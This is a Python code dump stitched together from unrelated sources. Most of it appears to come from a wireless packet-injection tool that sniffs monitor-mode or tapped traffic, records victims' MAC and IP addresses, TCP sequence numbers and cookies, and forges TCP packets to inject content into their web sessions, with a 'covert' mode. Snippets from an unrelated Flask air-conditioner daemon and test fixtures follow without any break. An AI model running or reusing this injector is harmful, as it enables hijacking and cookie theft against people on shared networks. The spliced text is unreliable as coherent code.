injection += '</body>'
#print injection
return injection
def condensor(self,
vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr,
args,
injection,
victim):
"""Condense some of the logic into a single function"""
if victim.victim_parameters.covert:
cov_injection = self.covert_injection(svrip,
seqnum,
request,
injection)
if cov_injection != 0:
injection = cov_injection
else:
return 0
#print injection
self.injector.inject(vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
injection,
TSVal,
TSecr)
#print 'sent'
def proc_excluded(self, excluded):
"""Check if argument provided in excluded is an ip.
If it's not, dns resolve it and add those IPs to the exclude list.
"""
processed = set()
for item in excluded:
try:
test = item.split('.')
if len(test) != 4:
try:
processed.add(socket.gethostbyname(item))
except:
pass
### This logic can be cleaner/faster
### regex -or- (mac check, then assume if try fails, it must be ip)
else:
#print test
try:
if int(test[0])>0 and int(test[0]) < 256:
if int(test[1])>0 and int(test[1]) < 256:
if int(test[2])>0 and int(test[2]) < 256:
if int(test[3])>0 and int(test[3]) < 256:
processed.add(item)
except:
processed.add(socket.gethostbyname(item))
except:
try:
processed.add(socket.gethostbyname(item))
except:
pass
return processed
def proc_handler(self, packet, args):
"""Process handler responsible for the last mile of packet filtering
Obtains packet specific information and stores it to memory
"""
if packet.haslayer(IP) and packet.haslayer(TCP):
## Trigger check
request = self.requestExtractor(packet)
if self.trigger in request:
## MONITOR MODE
if self.nic == 'mon':
rtrmac = packet.getlayer(Dot11).addr1
vicmac = packet.getlayer(Dot11).addr2
dstmac = packet.getlayer(Dot11).addr3
## TAP MODE
else:
rtrmac = packet.getlayer(Ether).dst
vicmac = packet.getlayer(Ether).src
dstmac = 'TAP'
vicip = packet.getlayer(IP).src
svrip = packet.getlayer(IP).dst
vicport = packet.getlayer(TCP).sport
svrport = packet.getlayer(TCP).dport
size = len(packet.getlayer(TCP).load)
acknum = str(int(packet.getlayer(TCP).seq) + size)
seqnum = packet.getlayer(TCP).ack
global BLOCK_HOSTS
for obj in BLOCK_HOSTS:
ip, seq = obj
if svrip == ip and seqnum != seq:
#print "REMOVING ", svrip
for obj2 in BLOCK_HOSTS:
ip2, seq2 = obj2
if ip2 == svrip:
BLOCK_HOSTS.remove((ip2, seq2))
if args.pcap:
wrpcap('inbound.pcap', packet)
else:
return 0
#print BLOCK_HOSTS
try:
TSVal, TSecr = packet.getlayer(TCP).options[2][1]
except:
TSVal = None
TSecr = None
cookie = self.cookieSearch(request)
#print (vicmac, rtrmac, vicip, svrip, vicport, svrport, acknum, seqnum, request, cookie, TSVal, TSecr)
return (vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr)
return None
def proc_injection(self,
vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr,
args):
"""Process injection function using the PacketHandler.victims List.
If it was set, to check if the packet belongs to any of the targets.
If no victims List is set, meaning it's in broadcast mode, it checks
for the victim in PacketHandler.newvictims and gets the injection for it,
if there is one, and injects it via Injector.inject().
"""
if len(self.victims) == 0:
if self.victim_parameters.in_request is not None:
result = self.victim_parameters.proc_in_request(request)
#print result
if (not result):
return 0
if self.excluded is not None:
if svrip in self.excluded:
return 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr,
args,
injection,
victim)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr,
args,
injection,
victim)
else:
if self.victim_parameters is not None:
if self.victim_parameters.in_request is not None:
result = self.victim_parameters.proc_in_request(request)
#print result
if not result:
return 0
if self.excluded is not None:
if svrip in self.excluded:
return 0
for victim in self.newvictims:
if victim.ip is not None:
if victim.ip == vicip:
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr,
args,
injection,
victim)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr,
args,
injection,
victim)
if self.excluded is not None:
if svrip in self.excluded:
return 0
for victim in self.victims:
if victim.ip is not None:
if victim.ip == vicip:
if victim.victim_parameters.in_request is not None:
result = victim.victim_parameters.proc_in_request(request)
if not result:
return 0
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr,
args,
injection,
victim)
else:
if victim.mac is not None:
if victim.mac.lower() == vicmac.lower():
if victim.victim_parameters.in_request is not None:
result = victim.victim_parameters.proc_in_request(request)
if not result:
return 0
injection = victim.get_injection()
if injection is not None:
self.condensor(vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr,
args,
injection,
victim)
def process(self, interface, pkt, args):
"""Process packets coming from the sniffer.
You can override the handler with one of your own,
that you can use for any other packet type (e.g DNS),
otherwise it uses the default packet handler looking
for GET requests for injection and cookies.
"""
## You can write your own handler for packets
## If wanted, do something like:
#if self.handler is not None:
#self.handler(interface, pkt, args)
#else:
try:
vicmac,\
rtrmac,\
dstmac,\
vicip,\
svrip,\
vicport,\
svrport,\
acknum,\
seqnum,\
request,\
cookie,\
TSVal,\
TSecr = self.proc_handler(pkt, args)
self.cookieManager(vicmac,
vicip,
cookie,
args)
self.proc_injection(vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
request,
cookie,
TSVal,
TSecr,
args)
except:
return
def requestExtractor(self, pkt):
"""Extracts the payload for trigger processing"""
ret2 = "\n".join(pkt.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n"))
if len(ret2.strip()) > 0:
return ret2.translate(None, "'").strip()
else:
return None
def inject_middleware(inj: Injector):
inj.build(AuthAdminMiddleware, AuthAdminMiddlewareImpl)
CORS(inj.require(Flask))
return inj
def inject_external_dependency(inj: Injector):
# 无依赖接口
inj.provide(Serializer, JSONSerializer())
# system接口
inj.provide(SystemEntropyProvider, SystemEntropyProviderImpl())
# 日志
logger = std_logging.StdLoggerImpl()
logger.logger.addHandler(std_logging.StreamHandler())
inj.provide(Logger, logger)
inj.provide(Flask, Flask(APPName))
inj.build(OptionProvider, StdArgParser)
inj.build(ConfigurationProvider, FileConfigurationProvider)
inj.build(RouteController, FlaskRouteController)
inj.build(JWT, PyJWTImpl)
return inj
def inject_global_vars(inj: Injector):
inj.provide(APPVersion, 'v0.1.0')
inj.provide(APPDescription, 'center air conditioner daemon base on flask')
inj.provide(APPName, 'center-air-conditioner-daemon')
return inj
def expose_service(inj: Injector):
opt = inj.require(OptionProvider) # type: OptionProvider
DaemonFlaskRouter(inj).run(opt.find('host'), opt.find('port'))
if __name__ == '__main__':
"""
Injector中保存了构建的上下文
injector的使用方法参考 lib/injector.py类的说明
"""
lib.functional.compose_(*[
# 注入全局上下文
inject_global_vars,
register_singletons,
# 注入外部依赖
inject_external_dependency,
# 分层构建模块
inject_middleware,
inject_service,
inject_controller,
# 将服务暴露到进程外
boot_server,
expose_service,
])(Injector()) # type: Injector
def __init__(self, injector: Injector):
super().__init__(injector)
self.apply_ctl(injector.require(PingController), master_http_spec.ping)
self.apply_ctl(injector.require(DaemonAdminController), daemon_http_spec.admin)
def __init__(self, inj: Injector):
self.s = inj.require(Serializer) # type: Serializer
def setUp(self) -> None:
self.db = SQLite3(memory=True)
self.injector = Injector()
self.injector.provide(SQLDatabase, self.db)
self.model = None
def __init__(self, inj: Injector):
super().__init__(inj)
self.event_model = inj.require(EventModel)
self.statistic_model = inj.require(StatisticModel)
self.metric_model = inj.require(MetricModel)
self.room_model = inj.require(RoomModel)
